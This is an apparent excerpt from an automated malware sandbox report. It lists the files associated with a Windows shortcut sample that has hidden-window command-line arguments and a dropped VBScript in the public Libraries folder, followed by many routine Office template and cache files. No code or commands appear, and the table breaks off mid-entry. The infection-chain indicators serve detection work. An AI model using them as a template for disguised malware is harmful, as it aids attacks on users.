Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
yv5ssYfoTG.lnk
|
MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Wed Nov
8 04:43:43 2023, mtime=Wed Nov 8 04:43:43 2023, atime=Wed Nov 8 04:43:43 2023, length=0, window=hide
|
initial sample
|
 |
|
|
C:\Users\Public\Libraries\Libraries.vbs
|
ASCII text, with very long lines (677), with CRLF line terminators
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x87a63beb, page size 16384, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_40.ttf
|
TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights
Reserved.msofp_4_40RegularVersion 4.40;O365
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{9DFEEFC7-4AB2-46A4-8B51-66E1042D4695}.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\623-6341-11.docx
|
Microsoft Word 2007+
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1727703151068771400_9732F0DB-5EDA-47CD-9232-258D813B5AF5.log
|
ASCII text, with very long lines (1978), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1727703151069321600_9732F0DB-5EDA-47CD-9232-258D813B5AF5.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD18F6.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD18F6.tmp\architecture.glox
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1908.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1908.tmp\chevronaccent.glox
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1918.tmp\BracketList.glox
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1918.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1958.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1958.tmp\iso690.xsl
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1959.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1959.tmp\gosttitle.xsl
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD196A.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD196A.tmp\gb.xsl
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD196B.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD196B.tmp\Equations.dotx
|
Microsoft Word 2007+
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD197B.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD197B.tmp\InterconnectedBlockProcess.glox
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD198C.tmp\APASixthEditionOfficeOnline.xsl
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD198C.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD199E.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD199E.tmp\Text Sidebar (Annual Report Red and Black design).docx
|
Microsoft Word 2007+
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD19C7.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD19C7.tmp\gostname.xsl
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD19D7.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD19D7.tmp\RadialPictureList.glox
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD19D8.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD19D8.tmp\TabList.glox
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD19E9.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD19E9.tmp\TabbedArc.glox
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD19FA.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD19FA.tmp\rings.glox
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD19FB.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD19FB.tmp\ConvergingText.glox
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD19FC.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD19FC.tmp\VaryingWidthList.glox
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A0C.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A0C.tmp\PictureFrame.glox
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A3D.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A3D.tmp\pictureorgchart.glox
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A3E.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A3E.tmp\mlaseventheditionofficeonline.xsl
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A40.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A40.tmp\harvardanglia2008officeonline.xsl
|
XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A41.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A41.tmp\chicago.xsl
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A52.tmp\CircleProcess.glox
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A52.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A53.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A53.tmp\ieee2006officeonline.xsl
|
XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A63.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A63.tmp\iso690nmerical.xsl
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A64.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A64.tmp\turabian.xsl
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A65.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A65.tmp\sist02.xsl
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A87.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1A87.tmp\HexagonRadial.glox
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1AA7.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1AA7.tmp\ThemePictureAccent.glox
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1AB7.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1AB7.tmp\Element design set.dotx
|
Microsoft Word 2007+
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1ADA.tmp\Banded.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1ADA.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1B0B.tmp\Basis.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1B0B.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1B3D.tmp\View.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1B3D.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1B5E.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1B5E.tmp\ThemePictureAlternatingAccent.glox
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1B5F.tmp\Metropolitan.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1B5F.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1B7F.tmp\Wood_Type.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1B7F.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1BAF.tmp\Dividend.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1BAF.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1BB0.tmp\Content.inf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1BB0.tmp\ThemePictureGrid.glox
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1C10.tmp\Parallax.thmx
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1C10.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1C31.tmp\Parcel.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1C31.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1C62.tmp\Quotable.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1C62.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1CC1.tmp\Berlin.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1CC1.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1E99.tmp\Savon.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1E99.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1EBA.tmp\Gallery.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1EBA.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1F19.tmp\Droplet.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD1F19.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD2016.tmp\Slate.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD2016.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD2027.tmp\Damask.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD2027.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD2087.tmp\Circuit.thmx
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD2087.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD2637.tmp\Main_Event.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD2637.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD2638.tmp\Mesh.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD2638.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD2706.tmp\Vapor_Trail.thmx
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD2706.tmp\content.inf
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\TCD2707.tmp\Content.inf
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\TCD2707.tmp\Insight design set.dotx
|
Microsoft Word 2007+
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_254xmxla.odw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hdlgyccw.wh0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_piyysqca.j5k.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1x2bi45.1ka.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sthwqxqb.xlk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uinqu5e1.mau.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18A5.tmp
|
Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf",
2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18A6.tmp
|
Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders,
flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18A7.tmp
|
Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf",
2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18A8.tmp
|
Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders,
flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18A9.tmp
|
Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders,
flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18AA.tmp
|
Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1,
extra bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18AB.tmp
|
Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1,
extra bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18AC.tmp
|
Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders,
flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18BC.tmp
|
Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders,
flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18BD.tmp
|
Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1,
extra bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18BE.tmp
|
Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx",
iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18BF.tmp
|
Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number
1, extra bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18C0.tmp
|
Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders,
flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18C1.tmp
|
Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders,
flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18C2.tmp
|
Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf",
2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18D3.tmp
|
Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders,
flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18D4.tmp
|
Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags
0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18D5.tmp
|
Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf",
2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab18E6.tmp
|
Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags
0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1907.tmp
|
Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1,
extra bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab199C.tmp
|
Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra
bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab199D.tmp
|
Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number
1, extra bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab19AF.tmp
|
Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number
1, extra bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab19B0.tmp
|
Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra
bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab19B1.tmp
|
Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number
1, extra bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab19B2.tmp
|
Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags
0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab19B3.tmp
|
Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra
bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab19B4.tmp
|
Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number
1, extra bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab19B5.tmp
|
Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number
1, extra bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab19B6.tmp
|
Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1,
extra bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1A0D.tmp
|
Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number
1, extra bytes 20 in head, 1 datablock, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1A3F.tmp
|
Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338,
number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1A76.tmp
|
Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf",
2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1AC8.tmp
|
Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359,
number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1AC9.tmp
|
Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632,
number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1AFA.tmp
|
Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885,
number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1B1B.tmp
|
Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169,
number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1B1C.tmp
|
Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID
19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1B3C.tmp
|
Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778,
number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1BD0.tmp
|
Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081,
number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1C20.tmp
|
Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500,
number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1C41.tmp
|
